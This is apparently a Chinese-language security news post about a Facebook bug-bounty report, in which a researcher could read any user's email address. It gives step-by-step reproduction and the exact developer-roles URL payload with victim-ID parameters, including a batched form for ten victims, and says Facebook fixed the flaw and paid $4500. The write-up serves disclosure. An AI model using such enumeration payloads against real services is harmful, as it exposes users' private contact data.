日前，国外安全研究者Roy Castillo发现了FaceBook的一个安全问题，在没有任何用户交互的情况下，可以查看任意用户的邮箱地址，提交到FaceBook之后，得到了FaceBook $4500大洋的奖励。

步骤重现：

1、从Facebook的用户个人资料页面提取用户名称，地址：http://www.facebook.com/directory/people/
2、从FaceBook Graph API中提取用户的ID，如用户first_name为Sdfsdfsdafd，last_name为Sdfdsafsdfds，打开http://graph.facebook.com/sdfsdfsdafd.sdfdsafsdfds，可以提取到用户ID为100006240120652。
3、创建Facebook应用–》设置–》开发者角色。
4、最终该漏洞的payload如下：

https://developers.facebook.com/apps/APPLICATION_ID/roles?unverified_groups[1][0]=VICTIM_UID

可以通过增加参数，得到更多的电子邮件地址，如下：

https://developers.facebook.com/apps/APPLICATION_ID/roles
?unverified_groups[1][0]=VICTIM_UID1
&unverified_groups[2][0]=VICTIM_UID2
&unverified_groups[3][0]=VICTIM_UID3
&unverified_groups[4][0]=VICTIM_UID4
&unverified_groups[5][0]=VICTIM_UID5
&unverified_groups[6][0]=VICTIM_UID6
&unverified_groups[7][0]=VICTIM_UID7
&unverified_groups[8][0]=VICTIM_UID8
&unverified_groups[9][0]=VICTIM_UID9
&unverified_groups[10][0]=VICTIM_UID10

公布这个问题之后，Facebook安全响应团队在一个小时左右联系了漏洞提交者：

在上午8点26分该漏洞被修复。

不久之后，Roy Castillo得到了Facebook安全团队的4500美元奖励。

作者赤裸裸的炫耀

[感谢fake提供 via roy-castillo]